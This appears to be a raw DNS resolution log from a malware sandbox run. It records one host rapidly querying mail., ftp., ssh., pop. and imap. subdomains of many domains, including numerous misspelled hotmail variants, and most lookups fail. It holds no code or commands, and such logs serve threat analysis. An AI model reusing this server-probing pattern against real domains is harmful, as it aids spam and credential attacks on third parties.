Feb 21, 2024 00:26:10.288265944 CET	1.1.1.1	192.168.2.6	0xd851	Name error (3)	ftp.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.289036989 CET	1.1.1.1	192.168.2.6	0x2fc7	Name error (3)	mail.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.301291943 CET	1.1.1.1	192.168.2.6	0xf793	Name error (3)	mail.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.319202900 CET	1.1.1.1	192.168.2.6	0x3426	Name error (3)	ftp.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.326541901 CET	1.1.1.1	192.168.2.6	0x2326	Name error (3)	mail.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.331917048 CET	1.1.1.1	192.168.2.6	0x9c60	Name error (3)	mail.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.334851027 CET	1.1.1.1	192.168.2.6	0x2a67	Name error (3)	mail.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.344585896 CET	1.1.1.1	192.168.2.6	0xfe2e	Name error (3)	ftp.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.346848011 CET	1.1.1.1	192.168.2.6	0x9dd3	Name error (3)	ftp.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.355550051 CET	1.1.1.1	192.168.2.6	0xeb2e	No error (0)	www.schussundtor.de	sedoparking.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:10.355550051 CET	1.1.1.1	192.168.2.6	0xeb2e	No error (0)	sedoparking.com		64.190.63.136	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.372590065 CET	1.1.1.1	192.168.2.6	0xb00c	Name error (3)	mail.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.413486958 CET	1.1.1.1	192.168.2.6	0x56a	Name error (3)	mail.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.417062044 CET	1.1.1.1	192.168.2.6	0xd314	Name error (3)	ftp.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.418683052 CET	1.1.1.1	192.168.2.6	0x6079	Name error (3)	ftp.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.433900118 CET	1.1.1.1	192.168.2.6	0x94cf	Name error (3)	mail.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.444520950 CET	1.1.1.1	192.168.2.6	0xac3c	No error (0)	sell.sawbrokers.com		85.10.133.119	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.446125984 CET	1.1.1.1	192.168.2.6	0x53bc	Name error (3)	outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.446206093 CET	1.1.1.1	192.168.2.6	0x53bc	Name error (3)	outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.548515081 CET	1.1.1.1	192.168.2.6	0x8a22	Name error (3)	mail.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.563497066 CET	1.1.1.1	192.168.2.6	0x5802	Name error (3)	mail.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.564965010 CET	1.1.1.1	192.168.2.6	0xfcfa	Name error (3)	mail.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.582951069 CET	1.1.1.1	192.168.2.6	0xff9e	Name error (3)	ssh.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.640043020 CET	1.1.1.1	192.168.2.6	0x518a	Name error (3)	ssh.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.651423931 CET	1.1.1.1	192.168.2.6	0xac8c	Name error (3)	ftp.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.662357092 CET	1.1.1.1	192.168.2.6	0x9b15	Name error (3)	ssh.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.668170929 CET	1.1.1.1	192.168.2.6	0x899	Name error (3)	ssh.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.669215918 CET	1.1.1.1	192.168.2.6	0x2a8d	Name error (3)	ssh.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.703919888 CET	1.1.1.1	192.168.2.6	0xab34	Name error (3)	mail.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.718664885 CET	1.1.1.1	192.168.2.6	0x7d38	Name error (3)	mail.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.721369982 CET	1.1.1.1	192.168.2.6	0xf435	No error (0)	www.shinko-kensetsu.eei.jp	shinko-kensetsu.eei.jp		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:10.721369982 CET	1.1.1.1	192.168.2.6	0xf435	No error (0)	shinko-kensetsu.eei.jp		223.29.45.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.725773096 CET	1.1.1.1	192.168.2.6	0x1465	Name error (3)	ssh.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.813988924 CET	1.1.1.1	192.168.2.6	0xccd0	Name error (3)	mail.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.827713013 CET	1.1.1.1	192.168.2.6	0x38c	Name error (3)	ssh.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.869448900 CET	1.1.1.1	192.168.2.6	0xe3c0	Name error (3)	ssh.sq-community.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.869820118 CET	1.1.1.1	192.168.2.6	0x23ae	Name error (3)	ssh.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.874356031 CET	1.1.1.1	192.168.2.6	0x2442	Name error (3)	ssh.esafrica.co.zw	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.875010014 CET	1.1.1.1	192.168.2.6	0xc9a9	Name error (3)	ssh.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.875643969 CET	1.1.1.1	192.168.2.6	0xf61d	Name error (3)	mail.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.875966072 CET	1.1.1.1	192.168.2.6	0x8f0	Name error (3)	ssh.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.876108885 CET	1.1.1.1	192.168.2.6	0x3532	Name error (3)	ssh.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.876729965 CET	1.1.1.1	192.168.2.6	0x2e23	Name error (3)	mail.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.879651070 CET	1.1.1.1	192.168.2.6	0x111	Name error (3)	ftp.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.879890919 CET	1.1.1.1	192.168.2.6	0xe718	Name error (3)	mail.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.883451939 CET	1.1.1.1	192.168.2.6	0x6869	Name error (3)	ssh.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.887684107 CET	1.1.1.1	192.168.2.6	0x2af8	Name error (3)	ssh.aregods.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.913616896 CET	1.1.1.1	192.168.2.6	0x4af5	Name error (3)	ftp.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.932429075 CET	1.1.1.1	192.168.2.6	0x3b5	Name error (3)	mail.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.942833900 CET	1.1.1.1	192.168.2.6	0x7b14	Name error (3)	ssh.architettosangiorgio.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.945970058 CET	1.1.1.1	192.168.2.6	0xd46b	Name error (3)	ssh.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.952075005 CET	1.1.1.1	192.168.2.6	0x7316	Name error (3)	mail.newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.955508947 CET	1.1.1.1	192.168.2.6	0x9c21	Name error (3)	mail.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.955854893 CET	1.1.1.1	192.168.2.6	0x34b5	Name error (3)	mail.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.966370106 CET	1.1.1.1	192.168.2.6	0xec34	Name error (3)	ssh.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.969093084 CET	1.1.1.1	192.168.2.6	0x4e3d	Name error (3)	ssh.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.973496914 CET	1.1.1.1	192.168.2.6	0xbea9	Name error (3)	ssh.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.033421040 CET	1.1.1.1	192.168.2.6	0xb2e8	No error (0)	www.ovh.co.uk		198.27.92.7	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.038870096 CET	1.1.1.1	192.168.2.6	0xc2f9	Name error (3)	ssh.29hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.047374010 CET	1.1.1.1	192.168.2.6	0x3c8d	Name error (3)	ssh.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.061458111 CET	1.1.1.1	192.168.2.6	0x9c08	Name error (3)	ssh.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.064110041 CET	1.1.1.1	192.168.2.6	0xf8ff	Name error (3)	ssh.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.074455976 CET	1.1.1.1	192.168.2.6	0xa132	Name error (3)	ssh.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.078998089 CET	1.1.1.1	192.168.2.6	0xc8a4	Name error (3)	ssh.temxp.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.103322029 CET	1.1.1.1	192.168.2.6	0x753	No error (0)	ftp.cdgcapitalbourse.ma	iisclu1.menara.ma		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:11.103322029 CET	1.1.1.1	192.168.2.6	0x753	No error (0)	iisclu1.menara.ma		196.217.246.60	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.112688065 CET	1.1.1.1	192.168.2.6	0xfdd2	Name error (3)	ssh.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.123675108 CET	1.1.1.1	192.168.2.6	0x246	Name error (3)	ssh.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.133727074 CET	1.1.1.1	192.168.2.6	0xcbd7	Name error (3)	ssh.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.145555019 CET	1.1.1.1	192.168.2.6	0xc826	Name error (3)	ftp.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.197819948 CET	1.1.1.1	192.168.2.6	0x3e6c	Name error (3)	ssh.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.254667997 CET	1.1.1.1	192.168.2.6	0x8dd3	Name error (3)	ssh.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.293576002 CET	1.1.1.1	192.168.2.6	0x1447	Name error (3)	ssh.cdgcapitalbourse.ma	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.296201944 CET	1.1.1.1	192.168.2.6	0x23b8	Name error (3)	ssh.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.310462952 CET	1.1.1.1	192.168.2.6	0x1950	Name error (3)	mail.ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.311906099 CET	1.1.1.1	192.168.2.6	0x799a	Name error (3)	ssh.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.316560030 CET	1.1.1.1	192.168.2.6	0xfaa	Name error (3)	ssh.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.321595907 CET	1.1.1.1	192.168.2.6	0x1376	Name error (3)	ssh.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.324223042 CET	1.1.1.1	192.168.2.6	0xf5e2	Name error (3)	ssh.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.324249029 CET	1.1.1.1	192.168.2.6	0x715d	Name error (3)	ssh.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.340158939 CET	1.1.1.1	192.168.2.6	0xf146	Server failure (2)	ssh.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.369978905 CET	1.1.1.1	192.168.2.6	0xf19b	Name error (3)	ssh.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.373287916 CET	1.1.1.1	192.168.2.6	0xfee1	Name error (3)	ssh.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.380074024 CET	1.1.1.1	192.168.2.6	0x35d	Name error (3)	ssh.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.384788990 CET	1.1.1.1	192.168.2.6	0xef70	Name error (3)	ssh.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.385278940 CET	1.1.1.1	192.168.2.6	0x9b4	Name error (3)	mail.oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.388494015 CET	1.1.1.1	192.168.2.6	0xcfd5	Name error (3)	mail.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.395181894 CET	1.1.1.1	192.168.2.6	0x9160	Name error (3)	ssh.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.407735109 CET	1.1.1.1	192.168.2.6	0x21f1	Name error (3)	ssh.hoenighotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.416666985 CET	1.1.1.1	192.168.2.6	0xd97b	Name error (3)	ssh.igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.418170929 CET	1.1.1.1	192.168.2.6	0xa2e8	Name error (3)	imap.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.418205023 CET	1.1.1.1	192.168.2.6	0xa2e8	Name error (3)	imap.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.419687033 CET	1.1.1.1	192.168.2.6	0xfc75	Server failure (2)	mail.att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.485009909 CET	1.1.1.1	192.168.2.6	0xa2e8	Name error (3)	imap.jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.501599073 CET	1.1.1.1	192.168.2.6	0x222a	Name error (3)	ssh.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.576824903 CET	1.1.1.1	192.168.2.6	0x572a	Name error (3)	ssh.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.605364084 CET	1.1.1.1	192.168.2.6	0x25b7	No error (0)	caspianseagulltravels.com		31.193.11.2	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.643621922 CET	1.1.1.1	192.168.2.6	0x1dc2	Name error (3)	ssh.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.678252935 CET	1.1.1.1	192.168.2.6	0x2cc8	Name error (3)	ftp.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.699220896 CET	1.1.1.1	192.168.2.6	0x9872	Name error (3)	mail.sq-community.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.834561110 CET	1.1.1.1	192.168.2.6	0xc6a3	Name error (3)	pop.scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.912133932 CET	1.1.1.1	192.168.2.6	0x6bbe	Name error (3)	pop.generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.913985968 CET	1.1.1.1	192.168.2.6	0x41b3	Name error (3)	mail.gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.037070990 CET	1.1.1.1	192.168.2.6	0xd6b2	Name error (3)	mail.fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.098459005 CET	1.1.1.1	192.168.2.6	0xba90	No error (0)	ww1.imailzone.com	ww1.pltraffic33.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:12.098459005 CET	1.1.1.1	192.168.2.6	0xba90	No error (0)	ww1.pltraffic33.com	sedoparking.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:12.098459005 CET	1.1.1.1	192.168.2.6	0xba90	No error (0)	sedoparking.com		64.190.63.136	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.216588020 CET	1.1.1.1	192.168.2.6	0x2dc9	Name error (3)	pop.lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.284701109 CET	1.1.1.1	192.168.2.6	0x7e3e	Name error (3)	pop.runyai-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.292996883 CET	1.1.1.1	192.168.2.6	0x12c2	Name error (3)	pop.schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.328391075 CET	1.1.1.1	192.168.2.6	0x6dfa	Name error (3)	pop.gamma.ocm.ne.jp	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.409882069 CET	1.1.1.1	192.168.2.6	0xbcb7	Name error (3)	pop.hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.475985050 CET	1.1.1.1	192.168.2.6	0x9117	Name error (3)	ssh.hotmail.fr.ar	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.487562895 CET	1.1.1.1	192.168.2.6	0xfde9	Name error (3)	pop.hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.518157959 CET	1.1.1.1	192.168.2.6	0xaec7	Name error (3)	pop.hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.524641991 CET	1.1.1.1	192.168.2.6	0xb011	Name error (3)	pop.morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.534030914 CET	1.1.1.1	192.168.2.6	0x166b	Name error (3)	pop.utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.549884081 CET	1.1.1.1	192.168.2.6	0x60e1	Name error (3)	pop.heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.562009096 CET	1.1.1.1	192.168.2.6	0x46b1	Name error (3)	pop.radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.600651026 CET	1.1.1.1	192.168.2.6	0x6a25	Name error (3)	ssh.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.619436026 CET	1.1.1.1	192.168.2.6	0xb01d	Name error (3)	pop.undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.629391909 CET	1.1.1.1	192.168.2.6	0x3276	Name error (3)	pop.terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.650538921 CET	1.1.1.1	192.168.2.6	0x4be2	Name error (3)	pop.att.no	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.656203985 CET	1.1.1.1	192.168.2.6	0x3a0d	Name error (3)	pop.hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.667767048 CET	1.1.1.1	192.168.2.6	0x6bac	No error (0)	www.publichouse.ie	ext-cust.squarespace.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:12.667767048 CET	1.1.1.1	192.168.2.6	0x6bac	No error (0)	ext-cust.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.667767048 CET	1.1.1.1	192.168.2.6	0x6bac	No error (0)	ext-cust.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.667767048 CET	1.1.1.1	192.168.2.6	0x6bac	No error (0)	ext-cust.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.667767048 CET	1.1.1.1	192.168.2.6	0x6bac	No error (0)	ext-cust.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.697227001 CET	1.1.1.1	192.168.2.6	0x7bfd	Name error (3)	pop.hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.705192089 CET	1.1.1.1	192.168.2.6	0x7a3f	Name error (3)	pop.zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.706296921 CET	1.1.1.1	192.168.2.6	0x3e29	Name error (3)	pop.hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.735536098 CET	1.1.1.1	192.168.2.6	0x316d	Name error (3)	pop.jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.759314060 CET	1.1.1.1	192.168.2.6	0x74b	Name error (3)	pop.rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.778794050 CET	1.1.1.1	192.168.2.6	0x198b	Name error (3)	pop.ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.817792892 CET	1.1.1.1	192.168.2.6	0xd2d5	Name error (3)	dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.819982052 CET	1.1.1.1	192.168.2.6	0x3097	Name error (3)	ufer-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.827544928 CET	1.1.1.1	192.168.2.6	0x9c32	Name error (3)	oulohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.828108072 CET	1.1.1.1	192.168.2.6	0xcca	Name error (3)	morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.831114054 CET	1.1.1.1	192.168.2.6	0x45a7	Name error (3)	pop.dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.833933115 CET	1.1.1.1	192.168.2.6	0xd9ca	Name error (3)	generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.834933996 CET	1.1.1.1	192.168.2.6	0xaf52	No error (0)	shinko-kensetsu.eei.jp		223.29.45.10	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.875344038 CET	1.1.1.1	192.168.2.6	0x9842	Name error (3)	pop.farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.886236906 CET	1.1.1.1	192.168.2.6	0x7019	Name error (3)	imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.889910936 CET	1.1.1.1	192.168.2.6	0xc04a	Name error (3)	pop.x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.891174078 CET	1.1.1.1	192.168.2.6	0x13f4	Name error (3)	gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.893954039 CET	1.1.1.1	192.168.2.6	0xa485	Name error (3)	pop.tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.897682905 CET	1.1.1.1	192.168.2.6	0x97e4	Name error (3)	pop.homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.903191090 CET	1.1.1.1	192.168.2.6	0xb18b	Name error (3)	pop.imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.905978918 CET	1.1.1.1	192.168.2.6	0x84b4	No error (0)	imap.wilsonfamilyinsurance.com	mail.wilsonfamilyinsurance.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:26:12.905978918 CET	1.1.1.1	192.168.2.6	0x84b4	No error (0)	mail.wilsonfamilyinsurance.com		162.241.216.197	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.946093082 CET	1.1.1.1	192.168.2.6	0xbb04	Server failure (2)	att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.946623087 CET	1.1.1.1	192.168.2.6	0x43ab	Name error (3)	hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.947778940 CET	1.1.1.1	192.168.2.6	0xbb04	Server failure (2)	att.co.id	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.950001955 CET	1.1.1.1	192.168.2.6	0xc522	Name error (3)	hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.951581001 CET	1.1.1.1	192.168.2.6	0xef7b	Name error (3)	zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.952548981 CET	1.1.1.1	192.168.2.6	0xf4e0	Name error (3)	mail.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.952564001 CET	1.1.1.1	192.168.2.6	0x961d	Name error (3)	pop.kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.952572107 CET	1.1.1.1	192.168.2.6	0xf4e0	Name error (3)	mail.outlook.fr.sg	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.957963943 CET	1.1.1.1	192.168.2.6	0x1c45	Name error (3)	undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.958383083 CET	1.1.1.1	192.168.2.6	0xfa59	Name error (3)	igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.964353085 CET	1.1.1.1	192.168.2.6	0xd621	Name error (3)	homehotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.964570045 CET	1.1.1.1	192.168.2.6	0x27df	Name error (3)	jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.964961052 CET	1.1.1.1	192.168.2.6	0xe9cb	Name error (3)	pop.hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.965168953 CET	1.1.1.1	192.168.2.6	0x309f	Name error (3)	pop.spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.966144085 CET	1.1.1.1	192.168.2.6	0xad59	Name error (3)	hotmail.fryahoo.fr	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.968801022 CET	1.1.1.1	192.168.2.6	0xcae9	Name error (3)	heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.969841957 CET	1.1.1.1	192.168.2.6	0x8575	Name error (3)	smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.970031977 CET	1.1.1.1	192.168.2.6	0x1b1c	Name error (3)	pop.smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.972877026 CET	1.1.1.1	192.168.2.6	0xbabb	Name error (3)	lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.027484894 CET	1.1.1.1	192.168.2.6	0x7490	Name error (3)	newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
